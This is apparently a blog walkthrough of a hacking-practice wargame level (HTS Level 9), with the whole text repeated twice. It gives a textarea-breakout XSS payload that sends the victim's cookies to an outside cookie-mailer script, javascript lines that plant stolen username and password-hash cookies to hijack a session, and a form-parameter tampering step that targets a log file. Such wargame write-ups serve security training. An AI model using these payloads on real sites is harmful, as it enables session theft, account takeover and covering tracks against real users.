Here are the javascript codes for HTS Level 9:
1. code, take a look at the cookie:
javascript:alert(document.cookie);
2. The xss exploit insert into the message to mr. crap:
</textarea> <script>window.location="http://getTheScript/getcookiemailer.php?keks="+document.cookie;</script>
3. The code to use the stolen cookie data:
javascript:document.cookie="strUsername=m-crap%40crappysoft.com";document.cookie="strPassword=94a35a3b7befff5eb2a8415af04aa16c";document.cookie="intID=1";
Now you can move the money!!
4. Deleting the session data.
Log out and go to the main page of crappy soft. Go to the mailing list form.
Now you need an Firefox extension like UrlParams or an Proxy with freeze function. Or you manipulate the Post data with an faked http header. How to fake http header with PHP you can take a look at this page:
http://hack1n9.blogspot.com/2008/06/hackthissiteorg-level-5-basic-lsung.html
But it is written in german. The fastest way is UrlParams extension for Firefox.
You must change the value of strFilename. strFilename="/files/logs/logs.txt". Now you must enter a valid email address with @ and a dot.
1. code, take a look at the cookie:
javascript:alert(document.cookie);
2. The xss exploit insert into the message to mr. crap:
</textarea> <script>window.location="http://getTheScript/getcookiemailer.php?keks="+document.cookie;</script>
3. The code to use the stolen cookie data:
javascript:document.cookie="strUsername=m-crap%40crappysoft.com";document.cookie="strPassword=94a35a3b7befff5eb2a8415af04aa16c";document.cookie="intID=1";
Now you can move the money!!
4. Deleting the session data.
Log out and go to the main page of crappy soft. Go to the mailing list form.
Now you need an Firefox extension like UrlParams or an Proxy with freeze function. Or you manipulate the Post data with an faked http header. How to fake http header with PHP you can take a look at this page:
http://hack1n9.blogspot.com/2008/06/hackthissiteorg-level-5-basic-lsung.html
But it is written in german. The fastest way is UrlParams extension for Firefox.
You must change the value of strFilename. strFilename="/files/logs/logs.txt". Now you must enter a valid email address with @ and a dot.
Kommentare